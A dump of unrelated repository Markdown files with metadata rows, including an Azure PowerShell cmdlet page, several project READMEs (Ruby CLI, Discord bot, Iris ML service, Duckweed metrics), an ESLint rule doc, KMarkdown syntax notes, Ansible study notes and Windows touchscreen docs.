### <a name="archive-samples"></a>Archivbeispiele
- [Beispiel für die XAML-Textbearbeitung](https://github.com/microsoftarchive/msdn-code-gallery-microsoft/tree/411c271e537727d737a53fa2cbe99eaecac00cc0/Official%20Windows%20Platform%20Sample/Windows%208%20app%20samples/%5BVB%5D-Windows%208%20app%20samples/VB/Windows%208%20app%20samples/XAML%20text%20editing%20sample%20(Windows%208))
| 98.728814 | 832 | 0.787067 | deu_Latn | 0.977768 |
9799db46b2e346aab389d53734fcf9ff7771f95e | 1,919 | md | Markdown | azureps-cmdlets-docs/ResourceManager/AzureRM.Network/v0.9.8/Get-AzureNetworkSecurityGroup.md | Evgenii011/azure-docs-powershell | 30e804249e1fb7af82ea9b01d7bdecb33ec238db | [
"CC-BY-4.0",
"MIT"
] | 2 | 2021-04-14T11:42:58.000Z | 2021-05-23T22:43:42.000Z | azureps-cmdlets-docs/ResourceManager/AzureRM.Network/v0.9.8/Get-AzureNetworkSecurityGroup.md | Evgenii011/azure-docs-powershell | 30e804249e1fb7af82ea9b01d7bdecb33ec238db | [
"CC-BY-4.0",
"MIT"
] | null | null | null | azureps-cmdlets-docs/ResourceManager/AzureRM.Network/v0.9.8/Get-AzureNetworkSecurityGroup.md | Evgenii011/azure-docs-powershell | 30e804249e1fb7af82ea9b01d7bdecb33ec238db | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-04-16T03:17:57.000Z | 2019-04-16T03:17:57.000Z | ---
external help file: Microsoft.Azure.Commands.Network.dll-Help.xml
online version:
schema: 2.0.0
ms.assetid: EF39FE54-FC9B-46AB-886F-0FACF66BAA1D
---
# Get-AzureNetworkSecurityGroup
## SYNOPSIS
Gets a network security group.
## SYNTAX
```
Get-AzureNetworkSecurityGroup [-Name <String>] [-ResourceGroupName <String>] [-Profile <AzureProfile>]
[<CommonParameters>]
```
## DESCRIPTION
The **Get-AzureNetworkSecurityGroup** cmdlet gets an Azure network security group.
## EXAMPLES
### 1:
```
```
## PARAMETERS
### -Name
Specifies the name of the network security group to get.
```yaml
Type: String
Parameter Sets: (All)
Aliases: ResourceName
Required: False
Position: Named
Default value: None
Accept pipeline input: True (ByPropertyName)
Accept wildcard characters: False
```
### -Profile
Specifies an Azure profile.
```yaml
Type: AzureProfile
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -ResourceGroupName
Specifies the name of the resource group that contains the network security group to get.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: None
Accept pipeline input: True (ByPropertyName)
Accept wildcard characters: False
```
### CommonParameters
This cmdlet supports the common parameters: -Debug, -ErrorAction, -ErrorVariable, -InformationAction, -InformationVariable, -OutVariable, -OutBuffer, -PipelineVariable, -Verbose, -WarningAction, and -WarningVariable. For more information, see about_CommonParameters (http://go.microsoft.com/fwlink/?LinkID=113216).
## INPUTS
## OUTPUTS
## NOTES
## RELATED LINKS
[New-AzureNetworkSecurityGroup](./New-AzureNetworkSecurityGroup.md)
[Remove-AzureNetworkSecurityGroup](./Remove-AzureNetworkSecurityGroup.md)
[Set-AzureNetworkSecurityGroup](./Set-AzureNetworkSecurityGroup.md)
| 20.2 | 314 | 0.766545 | yue_Hant | 0.46686 |
979a079ac3518f9a2fdaadf1faf91b6573cecec1 | 671 | md | Markdown | README.md | afrojun/ruby-cli-boilerplate | 75e2ca96f6bed85545de2c13af21cee3c6bdbf3f | [
"MIT"
] | null | null | null | README.md | afrojun/ruby-cli-boilerplate | 75e2ca96f6bed85545de2c13af21cee3c6bdbf3f | [
"MIT"
] | null | null | null | README.md | afrojun/ruby-cli-boilerplate | 75e2ca96f6bed85545de2c13af21cee3c6bdbf3f | [
"MIT"
] | null | null | null | # Ruby CLI Boilerplate
## Functionality
This is a Ruby 3.0 CLI boilerplate to help accelerate initial setup of CLI projects.
## Install
Make sure you have Ruby 3.1 installed (I use [asdf](https://asdf-vm.com/)), then run:
```sh
bundle
```
## Usage
```sh
# By default we will run the total views aggregator
bin/run.rb command something_important
# Specify the following options to do something different
bin/run.rb command something_important -c foo
```
To get a full list of available commands, or help on a specific on, use the `--help` or `-h` flag:
```sh
bin/run.rb -h
```
## Tests
```sh
rspec
```
A coverage report will be generated after the tests run.
| 17.657895 | 98 | 0.71386 | eng_Latn | 0.993782 |
979a23f99a9a8a3f74d4920ae166de7fae81af6e | 1,233 | md | Markdown | README.md | yashppawar/Thwipper-bot | 0187061bd762deb83c8371e2874d62677cca7847 | [
"MIT"
] | 1 | 2022-02-13T14:11:40.000Z | 2022-02-13T14:11:40.000Z | README.md | yashppawar/Thwipper-bot | 0187061bd762deb83c8371e2874d62677cca7847 | [
"MIT"
] | null | null | null | README.md | yashppawar/Thwipper-bot | 0187061bd762deb83c8371e2874d62677cca7847 | [
"MIT"
] | null | null | null | # Thwipper-bot
_<h2>🕷 What is Thwipper? 🕷</h2>_
Everything you need to keep the members of the server entertained, this bot has it.
Thwipper is inspired from my favorite fictional character Spider-Man. Its name is the onomatopoeia of Spider-Man using his web-shooters. Thwip!<br>
Prefixes => `[t!], [ _ ], [thwip] [thwipper]`<br>
<!-- <img src="\spiderman.png"></img> -->
<img src="https://wallpapercave.com/wp/wp7936066.jpg"></img>
_<h2>🕷 Features 🕷</h2>_
_IMDb_<br>
_Quips_<br>
_Reddit_<br>
_Google_<br>
_Wikipedia_<br>
_Music Player_<br>
_Conduct Polls_<br>
_Python & MySQL Shells_<br>
_Date, Time & Calendar_ <br>
_Encryption & Decryption_<br><br>
_MORE FEATURES COMING SOON_
_<h2>🕷 Note 🕷</h2>_
Have the bot token, SQL password, reddit client id, client secret and the user agent in a .py file in the same directory as `main.py`<br>
Make sure you have all the dependencies installed that are required for this bot to work.<br>
Especially `ffmpeg` as it is required to play music.
<a href="https://ffmpeg.org/download.html">Install ffmpeg here</a><br>
To install other dependencies required, use `pip install [dependency]`.<br>
P.S. Thanks to Alvin for helping out with web scraping.<br>
https://github.com/alvinbengeorge | 38.53125 | 147 | 0.735604 | eng_Latn | 0.938447 |
979a9652913afac02a3c7e62b17fa73768f4eb50 | 145 | md | Markdown | README.md | elionoula/PythonCalculatorHW | b4e75d8ebae7e60fc50c2c96b2df30790a4a5dff | [
"MIT"
] | null | null | null | README.md | elionoula/PythonCalculatorHW | b4e75d8ebae7e60fc50c2c96b2df30790a4a5dff | [
"MIT"
] | null | null | null | README.md | elionoula/PythonCalculatorHW | b4e75d8ebae7e60fc50c2c96b2df30790a4a5dff | [
"MIT"
] | null | null | null | # PythonCalculatorHW
This is an individual homework assignment for the IS601 course at NJIT, under the instruction of Professor Keith Williams.
| 36.25 | 122 | 0.827586 | eng_Latn | 0.998316 |
979ae747215074b254f07538d4d51d880e24e822 | 1,211 | md | Markdown | docs/zh-cn/kmarkdown.md | QRrui/api-docs | fe7838aebba45ddb64cd8962b3c7d571c356c1ae | [
"MIT"
] | null | null | null | docs/zh-cn/kmarkdown.md | QRrui/api-docs | fe7838aebba45ddb64cd8962b3c7d571c356c1ae | [
"MIT"
] | null | null | null | docs/zh-cn/kmarkdown.md | QRrui/api-docs | fe7838aebba45ddb64cd8962b3c7d571c356c1ae | [
"MIT"
] | null | null | null | # KMarkdown
在发送聊天消息时,为了支持用户的复杂的消息需求,以及有更好的用户体验,我们引入了 markdown,同时,基于 markdown 的标准规范,我们加入了自己的一些适配和扩展。为了与 markdown 进行区分,在本文档中,我们统一称之为 KMarkdown。
我们仅支持在文档中的一些语法,如果某个语法在 markdown 中,但是却没在文档中提及,那么它属于我们目前不支持的语法,建议用户不要使用。
我们还提供了kmarkdown消息编辑器,方便可视化编辑:[点击使用](https://kaiheila.cn/tools/message-builder.html#/kmarkdown)
## 主要格式规范
1. 语法来源大部分来自于默认的 markdown 语法。如果无特殊说明,用户只需遵守 markdown 语法即可。
2. 自定义的语法大部分会保证这样的格式:`(tagName)value(tagName)[attributes]`, 如果这个标签没有属性,那么 `[attributes]` 会被省略。
3. 大部分标签都支持换行。
|格式|语法来源| 说明|
|--|--|--|
|`**加粗文字**`| markdown| 加粗|
|`*斜体文字*`|markdown|斜体|
|`***加粗斜体***`|markdown|加粗斜体|
|`~~删除线~~`|markdown|删除线|
|`[链接文字](链接地址)`|markdown|链接,仅允许 http, https 的链接|
|`---`|markdown|分隔线|
|`> hello world`|markdown|引用:换行会一直作用,直到遇见两个换行(\n\n),这两个换行实际不会显示换行|
|`(ins)下划线内容(ins)`|自定义|下划线|
|`(spl)剧透(spl)`|自定义|内容默认是遮住的,只有用户点击才会显示|
|`:emoji:`|emoji|基本与emoji的 [shortcode](https://www.webfx.com/tools/emoji-cheat-sheet/) 写法保持一致|
|`(emj)服务器表情名(emj)[服务器表情id]`|自定义| 服务器表情,需要有服务器发送服务器表情的权限|
|`(chn)频道ID(chn)`|自定义|频道,提及频道|
|`(met)用户id/here/all(met)`|自定义|@用户,all 代表 @所有用户,here 代表 @所有在线用户|
|`(rol)角色ID(rol)`|自定义|@某角色所有用户|
|``` `行内代码` ```|markdown|行内代码|
|` ```语言\n ``` `|markdown|代码块|
|`\特殊字符`|markdown|转义,比如将命中语法的特殊字符原样显示|
| 34.6 | 129 | 0.712634 | yue_Hant | 0.730289 |
979bdf2c90c0e6216ea5b7099e45f7cf4a62fc35 | 3,389 | md | Markdown | docs/8.0.0/rules/prefer-promise-reject-errors.md | stephenwade/website | 654ee967e967f7d54899285f140866d39fa58c91 | [
"MIT"
] | 65 | 2015-05-18T12:57:43.000Z | 2019-05-17T16:36:07.000Z | docs/8.0.0/rules/prefer-promise-reject-errors.md | stephenwade/website | 654ee967e967f7d54899285f140866d39fa58c91 | [
"MIT"
] | 391 | 2015-01-18T01:08:56.000Z | 2019-07-12T19:22:09.000Z | docs/8.0.0/rules/prefer-promise-reject-errors.md | stephenwade/website | 654ee967e967f7d54899285f140866d39fa58c91 | [
"MIT"
] | 219 | 2015-01-24T20:36:38.000Z | 2019-07-07T04:14:06.000Z | ---
title: prefer-promise-reject-errors - Rules
layout: doc
edit_link: https://github.com/eslint/eslint/edit/master/docs/rules/prefer-promise-reject-errors.md
rule_type: suggestion
---
<!-- Note: No pull requests accepted for this file. See README.md in the root directory for details. -->
# require using Error objects as Promise rejection reasons (prefer-promise-reject-errors)
It is considered good practice to only pass instances of the built-in `Error` object to the `reject()` function for user-defined errors in Promises. `Error` objects automatically store a stack trace, which can be used to debug an error by determining where it came from. If a Promise is rejected with a non-`Error` value, it can be difficult to determine where the rejection occurred.
## Rule Details
This rule aims to ensure that Promises are only rejected with `Error` objects.
## Options
This rule takes one optional object argument:
* `allowEmptyReject: true` (`false` by default) allows calls to `Promise.reject()` with no arguments.
Examples of **incorrect** code for this rule:
```js
/*eslint prefer-promise-reject-errors: "error"*/
Promise.reject("something bad happened");
Promise.reject(5);
Promise.reject();
new Promise(function(resolve, reject) {
reject("something bad happened");
});
new Promise(function(resolve, reject) {
reject();
});
```
Examples of **correct** code for this rule:
```js
/*eslint prefer-promise-reject-errors: "error"*/
Promise.reject(new Error("something bad happened"));
Promise.reject(new TypeError("something bad happened"));
new Promise(function(resolve, reject) {
reject(new Error("something bad happened"));
});
var foo = getUnknownValue();
Promise.reject(foo);
```
Examples of **correct** code for this rule with the `allowEmptyReject: true` option:
```js
/*eslint prefer-promise-reject-errors: ["error", {"allowEmptyReject": true}]*/
Promise.reject();
new Promise(function(resolve, reject) {
reject();
});
```
## Known Limitations
Due to the limits of static analysis, this rule cannot guarantee that you will only reject Promises with `Error` objects. While the rule will report cases where it can guarantee that the rejection reason is clearly not an `Error`, it will not report cases where there is uncertainty about whether a given reason is an `Error`. For more information on this caveat, see the [similar limitations](no-throw-literal#known-limitations) in the `no-throw-literal` rule.
To avoid conflicts between rules, this rule does not report non-error values used in `throw` statements in async functions, even though these lead to Promise rejections. To lint for these cases, use the [`no-throw-literal`](https://eslint.org/docs/rules/no-throw-literal) rule.
## When Not To Use It
If you're using custom non-error values as Promise rejection reasons, you can turn off this rule.
## Further Reading
* [`no-throw-literal`](https://eslint.org/docs/rules/no-throw-literal)
* [Warning: a promise was rejected with a non-error](http://bluebirdjs.com/docs/warning-explanations.html#warning-a-promise-was-rejected-with-a-non-error)
## Version
This rule was introduced in ESLint 3.14.0.
## Resources
* [Rule source](https://github.com/eslint/eslint/tree/master/lib/rules/prefer-promise-reject-errors.js)
* [Documentation source](https://github.com/eslint/eslint/tree/master/docs/rules/prefer-promise-reject-errors.md)
| 34.938144 | 461 | 0.752729 | eng_Latn | 0.97669 |
979be28979ffc32ef09ae12817778748269866c9 | 4,541 | md | Markdown | README.md | patharanordev/simple-ml-as-a-services | fa08daa48176fa161487a025c361958ca61495b1 | [
"MIT"
] | 6 | 2020-11-08T06:18:08.000Z | 2021-11-16T13:02:45.000Z | README.md | patharanordev/simple-ml-as-a-services | fa08daa48176fa161487a025c361958ca61495b1 | [
"MIT"
] | null | null | null | README.md | patharanordev/simple-ml-as-a-services | fa08daa48176fa161487a025c361958ca61495b1 | [
"MIT"
] | null | null | null | # Simple Machine Learning as a Service (MLaaS)
Let's predict `Iris` species from Iris's metrics!!!

## Iris's species

## Iris's metrics
- Sepal length
- Sepal width
- Petal length
- Petal width
- Species
note :
- Sepal(กลีบเลี้ยง)
- Petal(กลีบดอก)

## Installation
```bash
pip install -r requirements.txt
```
## Create Simple model to predict Iris
Load Iris data set from Sci-Kit learn datasets
Ref. [Jupyter notebook](create-model.ipynb)
```py
from sklearn.datasets import load_iris
iris = load_iris()
X, y = iris['data'], iris['target']
```
### Reshape data
```py
from sklearn.model_selection import train_test_split
import numpy as np
dataset = np.hstack((X, y.reshape(-1,1)))
np.random.shuffle(dataset)
X_train, X_test, y_train, y_test = train_test_split(dataset[:,:4],
dataset[:,4],
test_size=0.2)
```
### Train model
In this example, I using `LogisticRegression` model :
```py
from sklearn.linear_model import LogisticRegression
model = LogisticRegression()
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
```
### Check accuracy
```py
from sklearn.metrics import accuracy_score
accuracy_score(y_test, y_pred)
```
### Save/Export the model
```py
import joblib
joblib.dump(model, 'iris.model')
```
## Simple Service with Flask
Example code :
```py
from flask import Flask, request
from flask_cors import CORS, cross_origin
import traceback
import sys
import joblib
import numpy as np
import os
app = Flask(__name__)
CORS(app)
model = None
@app.route('/iris', methods=['POST'])
@cross_origin()
def predict_species():
req = request.values['param']
inputs = np.array(req.split(','), dtype=np.float32).reshape(1,-1)
predict_target = model.predict(inputs)
if predict_target == 0:
return 'Setosa'
elif predict_target == 1:
return 'Versicolour'
else:
return 'Virginica'
if __name__ == '__main__':
try:
# Load model
model = joblib.load('iris.model')
port = int(os.environ.get('PORT', 5000))
app.run(host='0.0.0.0', port=port, debug=True)
except Exception as ex:
traceback.print_exc(file=sys.stdout)
```
## Iris's metrics for testing
| Sepal length | Sepal width | Petal length | Petal width |
|--------------|-------------|--------------|-------------|
| 5.1 | 3.5 | 1.4 | 0.2 |
It should predict to `Setosa`.
Example the request:

## Deploy the container to Heroku
Don't see it(the service) alone, let's deploy it to public cloud!!!
### Install Heroku CLI
Please refer to https://devcenter.heroku.com/articles/heroku-cli
### Deployment
In the root of the project directory :
```bash
$ heroku container:login
# Login Succeeded
$ heroku create YOUR_SERVICE_NAME
# Creating ⬢ YOUR_SERVICE_NAME... done
# https://YOUR_SERVICE_NAME.herokuapp.com/ | https://git.heroku.com/YOUR_SERVICE_NAME.git
$ heroku container:push web --app YOUR_SERVICE_NAME
# === Building web (/YOUR_DIRECTORY/Dockerfile)
# Sending build context to Docker daemon 4.793MB
# Step 1/7 : FROM python:3.7-slim-buster
# ...
# latest: digest: sha256:c7548c...............................788c01 size: 2001
# Your image has been successfully pushed. You can now release it with the 'container:release' command.
$ heroku container:release web --app YOUR_SERVICE_NAME
# Releasing images web to YOUR_SERVICE_NAME... done
```
Check service status :
```bash
$ heroku logs --app YOUR_SERVICE_NAME
# CURRENT_DATE_TIME app[api]: Initial release by user [email protected]
# CURRENT_DATE_TIME app[api]: Release v1 created by user [email protected]
# ...
# CURRENT_DATE_TIME app[web.1]: * Environment: production
# CURRENT_DATE_TIME app[web.1]: WARNING: This is a development server. Do not use it in a production deployment.
# CURRENT_DATE_TIME app[web.1]: Use a production WSGI server instead.
# CURRENT_DATE_TIME app[web.1]: * Debug mode: on
# CURRENT_DATE_TIME app[web.1]: * Running on http://0.0.0.0:13879/ (Press CTRL+C to quit)
# CURRENT_DATE_TIME app[web.1]: * Restarting with stat
# CURRENT_DATE_TIME app[web.1]: * Debugger is active!
# CURRENT_DATE_TIME app[web.1]: * Debugger PIN: 281-003-968
# CURRENT_DATE_TIME heroku[web.1]: State changed from starting to up
```

## License
MIT | 23.407216 | 112 | 0.678265 | eng_Latn | 0.501396 |
979c0ee6675b29ee19174d3d888959637b288dec | 203 | md | Markdown | source/04_table_of_contents.md | addulac/phd | 6f661ef24e684f5a1d5ac2e2c110fcdfc06e3de4 | [
"MIT"
] | null | null | null | source/04_table_of_contents.md | addulac/phd | 6f661ef24e684f5a1d5ac2e2c110fcdfc06e3de4 | [
"MIT"
] | null | null | null | source/04_table_of_contents.md | addulac/phd | 6f661ef24e684f5a1d5ac2e2c110fcdfc06e3de4 | [
"MIT"
] | 1 | 2022-01-31T14:16:54.000Z | 2022-01-31T14:16:54.000Z | <!--\pagenumbering{gobble}-->
\tableofcontents
\newpage
\addcontentsline{toc}{chapter}{\listfigurename}
\listoffigures
\newpage
\addcontentsline{toc}{chapter}{\listtablename}
\listoftables
\newpage
| 13.533333 | 47 | 0.773399 | eng_Latn | 0.206411 |
979c930fef2c07c189d217672d7f90ea94bf6467 | 5,516 | md | Markdown | README.md | civiccc/duckweed | af9c7d19601cf0577ceaec9c551f35255a25046c | [
"MIT"
] | 1 | 2020-12-27T20:56:40.000Z | 2020-12-27T20:56:40.000Z | README.md | civiccc/duckweed | af9c7d19601cf0577ceaec9c551f35255a25046c | [
"MIT"
] | null | null | null | README.md | civiccc/duckweed | af9c7d19601cf0577ceaec9c551f35255a25046c | [
"MIT"
] | null | null | null | # Duckweed
<img src="https://github.com/causes/duckweed/raw/master/public/icon.png" />
Duckweed is a general-purpose metrics service that can be used to count things.
It consists of a simple Sinatra front-end and a Redis back-end. No
configuration is required to start tracking new events; just make an HTTP POST
request to a Duckweed instance with a new event name and Duckweed will start
tracking it. Metrics can be read back from Duckweed with simple HTTP requests.
Examples of things you can do with Duckweed:
* product metrics: gauge the success of your product by pinging Duckweed every
time a user takes a particular action on your site
* health metrics: count important application events to get immediate feedback
when something is broken
* A/B testing: use Duckweed to record the activity of experiment and control
groups
* application and server monitoring: count periodic events using Duckweed and
ask a health monitoring service like Nagios to check whether the event's
frequency is above the desired minimum threshold
Duckweed was designed to be simple, reliable and performant. It's easy to
set-up, and easy to use. It's particularly optimized for providing immediate,
real-time feedback to help you be aware of what's going on right now in your
app. It's not really intended to be a historical archive of all activity on
your site reaching far back in time.
## Integration with third-party services
* Geckoboard: Duckweed knows how to export results in JSON format suitable for
consumption by Geckboard (http://www.geckoboard.com/), which means you can
easily get insight into Duckweed's metrics in the form of graphical charts
and counters
* Pingdom: Duckweed can answer health probes from the Pingdom monitoring
service (http://pingdom.com/) so that you can be alerted as soon as an
important metric falls below some critical threshold
* Airbrake/Hoptoad: Duckweed can talk to the Airbrake error reporting and
aggregaton service (http://airbrakeapp.com/), so you'll find out if anything
ever goes wrong with Duckweed itself
## Data storage
Events are stored in buckets of minute, hour, and day granularity. As Duckweed
is all about getting insight into current application behavior,
minute-granularity data is kept for 2 days, hour-granularity data is kept for
about a month, and day-granularity data is kept for 5 years.
## Set-up
1. Clone Duckweed on a box that has Redis installed and running
2. Install its dependencies using `bundle install`
3. Fire up a Ruby console with `bundle exec irb -r lib/duckweed/token -r
lib/duckweed`
4. Set-up an auth token with `Duckweed::Token.authorize 'secret_token', 'rw'`
5. Run Duckweed using your Rack-compatible server of choice (for example, using
`rackup`)
(Note that you can set up a token with read/write access for internal use, and
set up different tokens with only read access that you can assign to external
services such as Geckoboard and Pingdom.)
## Interface
You interact with Duckweed over a simple HTTP-based API. This means that you
can post events to Duckweed with basically any language that provides a means
of making HTTP requests. You can read event metrics back using the same tools.
It is even possible to script access to Duckweed using the `curl` tool from the
command-line.
All requests require authentication via the `auth_token` query paramter in the
URL, or HTTP Basic Authentication.
### `POST /track/:event`
Notify Duckweed that an event has occurred. Optionally takes a `quantity`
parameter (to indicate that a batch job has caused `:event` to occur a number
of times) and a `timestamp` parameter (useful, for example, when you are
running your Duckweed POST requests from an asynchronous work queue, and you
want the event to be recorded as having taken place when the job was enqueued,
not when it finally ran).
### `GET /count/:event` and `GET /count/:event/:granularity/:quantity`
Ask Duckweed the number of times an event has occurred. Optionally takes
`quantity` (a number) and `granularity` ("minutes", "hours", "days") parameters
so that you can specify the period over which the count should be returned.
Defaults to the last hour with minute-granularity. Also takes an optional
`offset` parameter, which can be used to look further back in time, starting
with older buckets (defaults to 1).
### `GET /histogram/:event`
Returns a JSON object suitable for consumption by Geckoboard which shows the
count of the requested `:event` over time. Respects the usual `quantity`,
`granuarity` and `offset` parameters.
### `GET /accumulate/:event`
Similar to the "histogram" action, but aggregates counts as it moves from older
to newer buckets, showing the additive affect of events over time.
### `POST /multicount`
Like "count" but can be used to query the counts for a large number of events
at once rather than having to make multiple GET requests.
### `GET /check/:event`
Given a `threshold` parameter make sure the count of the specified `:event` is
above the threshold. Returns a "GOOD" or "BAD" string that can be detected by a
monitoring service such as Nagios or Pingdom. Also takes the usual parameters
of `quantity` and `granularity`.
## About Causes (http://www.causes.com/)
We built Duckweed to give us real-time insight into our product's performance
and get rapid feedback on things like application health and experiment
results.
If you'd like to work with us, check out http://www.causes.com/join_us and get
in touch with us at [email protected].
| 44.483871 | 79 | 0.778463 | eng_Latn | 0.998852 |
979cacf696078ee4b7d96d7a31b3e7af6a05d278 | 5,656 | md | Markdown | Session3/README.md | Hexadecimalz/RHCE-Study | 8001843e0ba72afb85bcafbc52ec863c91dce9a7 | [
"Unlicense"
] | null | null | null | Session3/README.md | Hexadecimalz/RHCE-Study | 8001843e0ba72afb85bcafbc52ec863c91dce9a7 | [
"Unlicense"
] | null | null | null | Session3/README.md | Hexadecimalz/RHCE-Study | 8001843e0ba72afb85bcafbc52ec863c91dce9a7 | [
"Unlicense"
] | null | null | null | # Session 3
## ⚗ Variables
> [Variables](https://docs.ansible.com/ansible/latest/reference_appendices/glossary.html#term-Vars-Variables) As opposed to Facts, variables are names of values (they can be simple scalar values – integers, booleans, strings) or complex ones (dictionaries/hashes, lists) that can be used in templates and playbooks. They are declared things, not things that are inferred from the remote system’s current state or nature (which is what Facts are).
For example, see [using_vars.yml](using_vars.yaml) in this file we have several different ways that you can see to declare a variable in your playbook. You can declare separate files for variables, or set separate variables directly within the playbook. In each case, the variable declarations are at the top of the file. It makes sense for variables to be declared at the top of the playbook, just like when coding, since the playbook cannot find the value of something before it is referenced.
Another feature that Ansible allows are encrypted variables, which may include password or other sensitive data. In this example we have included [encrypted_vars.yaml](encrypted_vars.yaml) its password is `session123`.
Some example runs of this playbook:
`ansible-playbook session3/using_vars.yml --vault-password-file session3/decryption_pass.txt`
While we haven't covered Ansible Vault just yet, you can view the contents of the vault file using this command: `ansible-vault edit encrypted_vars.yml` and supply the password `session123`
### 🔭 Other Variable locations
- Variables can also be specified in the `group_vars` folder, which would be variables applied to groups in an inventory.
- Variables can also be specified in the `host_vars` folder, which would be specific to certain hosts, such as variables used only for `node1` in your lab cluster.
### 🔢 Variable Precedence
Variables are not a static declaration and are subject to change based on precedence.
Let's list from LEAST to MOST precedence.
1. Variables supplied in the `host_vars` or `group_vars` folders are applied first.
1. Variables stated in the `vars_files` section of your playbook. The last file in the declaration takes precedence.
1. Variables specified directly in the playbook.
1. Variables specified at the command line with the option `-e` or `--extra-vars`
## Use Ansible Galaxy to Create Roles
1. `ansible-galaxy role init nameoftherole`
1. `ansible-galaxy init --offline offlinerole`
While we aren't covering roles extensively just yet, you should know that you need at a minimum the tasks, vars, and defaults directories at a minimum for your roles. You can also create this structure manually.
## [Facts](https://docs.ansible.com/ansible/latest/reference_appendices/glossary.html#term-Facts)
Ansible by default collects details about nodes it connections to. These are details about the system, such as OS, IP, DNS, etc. Fact gathering can be turned on or off. In some case, it may be preferred to turn off fact gathering to speed up plays.
- 🖥️ at the prompt: `ansible all -m setup -a "filter=ansible_cmdline"`
- 🖥️ at the prompt: `ansible all -m setup -a "filter=ansible_devices"`
- 🖥️ at the prompt: `ansible node2 -m setup -a "filter=ansible_all_ipv4_addresses"`
- 🖥️ at the prompt: `ansible node2 -m setup -a "filter=ansible_hostname"`
## [⏭ Conditionals](https://docs.ansible.com/ansible/latest/reference_appendices/glossary.html#term-When)
Like any good script a conditional will help you decide *if* or *when* you should carry out a task. Ansible helps us carry this out using when. Conditionals can be paired with facts to make them run only when conditions on are system are met, such as have a specific hostname, ip address, or storage device.
See: [using_conditionals.yaml](using_conditionals.yaml)
*📃 conditionals.yml snippet*
```
- name: Print IP Address
debug:
msg:
when: ansible_default_ipv4.address == 192.168.1.35 and ansible_hostname "node1"
- name: Still Print
debug:
msg: Still shows!
when: ansible_default_ipv4.address == " crap" or ansible_hostname == "node1"
```
*📃 conditionals.yml*
```
---
- hosts: all
tasks:
- name: Run a command
shell: echo "Hello World"
register: runout
- name: Print some info
debug:
var: runout
when: "'World' in runout.stdout"
- name: Print out is Disk exists
debug:
msg: "Storage exists!"
when: ansible_device['sda'] is defined
```
You can also put each condition in its own parentheses (ansible_hostname == "x") and (ansible_user_dir == "other"). You can also supply multiple levels of parentheses to have nested conditionals.
You can also try `when: "'World' not in runout.stdout"`
## 📇 Using Facts in Templates
See: [var_template.j2](./var_template.j2)
Ansible is using Jinja2 Templates to make files with specific files and configurations that can be pulled from Ansible facts or variables.
Needs more detail...
## ⁉️ Error Handling
Ansible has several modules to handle errors. Ansible by default will stop running a playbook on the *first* error that it finds, unless another error handling method is defined.
See: [error_handling.yaml](error_handling.yaml)
To prevent Ansible from failing due to an error using `ignore_errors: true` during a play. You can also choose to `ignore_unreachable: true` if the host cannot be connected to. Another key option is to specify a maximum fail percentage with `max_fail_percentage: 40`
Similarly, you can also tell Ansible what it should expect by giving it key information about failure with `failed_when` or `changed_when` | 50.954955 | 496 | 0.756188 | eng_Latn | 0.998599 |
979cfd723066d9e9cf7b6d48003ba037ab8a9d73 | 1,912 | md | Markdown | design/component-guidelines/legacy-touchscreen-and-pen-resources.md | imingc/commercialization-public | 70a2bcf94b61655df50987bfea83d4fc7be443d9 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-01-25T20:02:01.000Z | 2019-01-25T20:02:01.000Z | design/component-guidelines/legacy-touchscreen-and-pen-resources.md | andreiztm/commercialization-public | 9a9565a191bc1ecddb33c9b26e701ae32b0c8d65 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | design/component-guidelines/legacy-touchscreen-and-pen-resources.md | andreiztm/commercialization-public | 9a9565a191bc1ecddb33c9b26e701ae32b0c8d65 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Legacy Touchscreen and Pen Resources
description: The topics in this section present legacy resources for Windows Touchscreen and Pen devices. This information applies to Windows 8 and earlier operating systems.
MSHAttr:
- 'PreferredSiteName:MSDN'
- 'PreferredLib:/library/windows/hardware'
ms.assetid: EADE3BD4-B9F3-493E-A545-DE7A732EB6EF
ms.author: eliotgra
ms.date: 05/02/2017
ms.topic: article
ms.prod: windows-hardware
ms.technology: windows-oem
---
# Legacy Touchscreen and Pen Resources
The topics in this section present legacy resources for Windows Touchscreen and Pen devices. This information applies to Windows 8 and earlier operating systems.
## In this section
<table>
<thead valign="bottom">
<tr class="header">
<th>Topic</th>
<th>Description</th>
</tr>
</thead>
<tbody valign="top">
<tr class="odd">
<td><p>[Windows Pointer Device Data Delivery Protocol](windows-pointer-device-data-delivery-protocol.md)</p></td>
<td><p>This section provides information about Windows 8 devices that support the pen, or touch, functionality.</p></td>
</tr>
<tr class="even">
<td><p>[Legacy Windows Touch Drivers](portal.md)</p></td>
<td><p>This section presents information about how to implement support for Windows Touch devices in Windows 7 and earlier operating systems.</p></td>
</tr>
<tr class="odd">
<td><p>[Windows Precision Touchpad Implementation Guide](windows-precision-touchpad-implementation-guide.md)</p></td>
<td><p>This topic describes how to implement a Windows Precision Touchpad in Windows 8.1. It provides guidelines for how to use the Human Interface Device (HID) protocol to communicate with the Windows host.</p></td>
</tr>
<tr class="even">
<td><p>[Additional Resources](additional-resources.md)</p></td>
<td><p>This topic presents resources for the legacy Windows Touchscreen and Pen devices for Windows 7 and earlier operating systems.</p></td>
</tr>
</tbody>
</table> | 39.833333 | 216 | 0.762029 | eng_Latn | 0.797638 |
979d2b92fa6503fb6ebcc61e87efa944f528f0a3 | 638 | md | Markdown | wiki/1. Home.md | clayne/nl_mcm | b0a6f9a90bde98f32eed20fa9b0e1e9225fd1fce | [
"MIT"
] | 5 | 2021-04-12T17:20:51.000Z | 2021-12-25T18:15:02.000Z | wiki/1. Home.md | clayne/nl_mcm | b0a6f9a90bde98f32eed20fa9b0e1e9225fd1fce | [
"MIT"
] | 13 | 2021-02-16T22:36:51.000Z | 2021-07-27T13:09:02.000Z | wiki/1. Home.md | clayne/nl_mcm | b0a6f9a90bde98f32eed20fa9b0e1e9225fd1fce | [
"MIT"
] | 3 | 2021-05-28T10:26:30.000Z | 2021-12-25T18:15:05.000Z | # Info
Is the wiki up to date?: \

## Quickstart
For a quickstart guide check out [this](https://github.com/MrOctopus/nl_mcm/wiki/2.-Quickstart) link.
## API
Read the corresponding wiki page to a ``.psc`` script for a closer explanation of NL_MCM's new API functionality.
## Special Thanks
A special thanks goes out to:
